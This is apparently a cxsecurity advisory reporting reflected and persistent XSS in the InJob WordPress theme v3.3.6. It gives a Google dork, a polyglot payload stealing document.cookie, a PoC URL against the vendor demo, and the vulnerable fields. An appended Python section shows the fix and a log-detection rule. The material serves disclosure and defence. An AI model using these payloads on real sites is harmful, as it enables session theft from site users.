InJob | Multi-purpose for recruitment WordPress Theme v3.3.6 Reflected & Persistent XSS

2019.09.16
SubversA (RU)
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: InJob | Multi-purpose for recruitment WordPress Theme v3.3.6 Reflected & Persistent XSS
# Google Dork: inurl:/wp-content/themes/injob/
# Date: 15/09/2019
# Exploit Author: SubversA
# Vendor Homepage: http://www.inwavethemes.com/
# Software Link: https://themeforest.net/item/injob-job-board-wordpress-theme/20322987
# Version: 3.3.6
# Tested on: Parrot OS
# CVE : -
# CWE : 79

----[]- Reflected XSS: -[]----

Use your payload inside the «Enter Keywords» input field and then submit the form; the payload is triggered twice.

Payload Sample:
<!--<img src="--><img src=x onerror=(alert)(document.cookie)//">

PoC Link:
http://jobboard.inwavethemes.com/jobs/?keyword=%3C%21--%3Cimg+src%3D%22--%3E%3Cimg+src%3Dx+onerror%3D%28alert%29%28document.cookie%29%2F%2F%22%3E&iwj_location=&iwj_cat=&iwj_type=&iwj_skill=&iwj_level=&iwj_salary=

----[]- Persistent XSS #1: -[]----

You need a new basic user account, then go to the dashboard and edit your profile.

Vulnerable input fields:
- «Phone» & «Headline *»;
- «Title» input field in the «Skills» section;
- «Title», «Description», «Date In - Date Out» & «Company Name» in the «Experiences» section;
- «Title», «Description» & «School Name» in the «Educations» section;
- «Address *» input field in the «Location & Map» section.

Use your payload inside any vulnerable input field and save your profile.

Payload Sample:
<!--<img src="--><img src=x onerror=(alert)(document.cookie)//">

PoC: log in as candidate:demo (login/password) and go to the dashboard, or as a guest go to the http://jobboard.inwavethemes.com/employers?alpha=i page.

----[]- Persistent XSS #2: -[]----

You need an employer user account, then go to the http://jobboard.inwavethemes.com/dashboard/?iwj_tab=new-job page to create a new job offer.

Vulnerable input fields: «Salary Postfix Text» and «Address *».

Payload Sample:
<img src=x onerror=(alert)(document.domain)//">
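Added example, written for this page and not taken from the advisory or from the theme's code: a Python reconstruction of the two reflection contexts the polyglot payload above is built for (an HTML comment and an attribute value), the per-context output encoding that neutralises it, and a simple access-log check for the `keyword` parameter. The template strings, the log format and the log lines are assumptions constructed for the demonstration.

```python
import html
import re
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Payload sample quoted in the advisory, kept verbatim for the demonstration.
PAYLOAD = '<!--<img src="--><img src=x onerror=(alert)(document.cookie)//">'

# Constructed access-log lines (assumed Apache combined format): the first carries the advisory's PoC query, the second a benign search.
SAMPLE_LOG = [
    '203.0.113.5 - - [16/Sep/2019:10:00:00 +0000] "GET /jobs/?keyword=%3C%21--%3Cimg+src%3D%22--%3E%3Cimg+src%3Dx+onerror%3D%28alert%29%28document.cookie%29%2F%2F%22%3E&iwj_location= HTTP/1.1" 200 5120',
    '203.0.113.6 - - [16/Sep/2019:10:00:01 +0000] "GET /jobs/?keyword=python+developer&iwj_location= HTTP/1.1" 200 5120',
]

def render_unsafe(keyword):
    # Hypothetical reconstruction of the flaw (not the theme's code): the raw
    # keyword is echoed both into an HTML comment and into an attribute value.
    return f'<!-- search: {keyword} --><input name="keyword" value="{keyword}">'

def render_safe(keyword):
    # Same template with encoding chosen per context: entity-encode (quotes included) for the
    # attribute, and split every '--' so the comment cannot be closed early (better: never echo input into comments).
    in_comment = re.sub(r"-(?=-)", "- ", keyword)
    in_attr = html.escape(keyword, quote=True)
    return f'<!-- search: {in_comment} --><input name="keyword" value="{in_attr}">'

class _SinkCounter(HTMLParser):
    # Counts <img> start tags carrying an onerror handler, as a tokenizer sees them.
    def __init__(self):
        super().__init__()
        self.hits = 0

    def handle_starttag(self, tag, attrs):
        if tag == "img" and any(name == "onerror" for name, _ in attrs):
            self.hits += 1

def live_onerror_sinks(markup):
    parser = _SinkCounter()
    parser.feed(markup)
    parser.close()
    return parser.hits

def suspicious_keyword_requests(log_lines):
    # Cheap detection rule for the reflected case: return the decoded 'keyword'
    # values of requests whose keyword carries a tag or an on*= handler.
    flagged = []
    for line in log_lines:
        target = line.split('"')[1].split(" ")[1]  # '/path?query' of '"GET /path?query HTTP/1.1"'
        for value in parse_qs(urlsplit(target).query).get("keyword", []):
            if "<" in value or re.search(r"\bon\w+\s*=", value, re.I):
                flagged.append(value)
    return flagged
```

The unsafe template yields two live `<img onerror>` elements from a single submission, which is the "triggered twice" behaviour the advisory describes; the safe template yields none.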


Copyright 2019, cxsecurity.com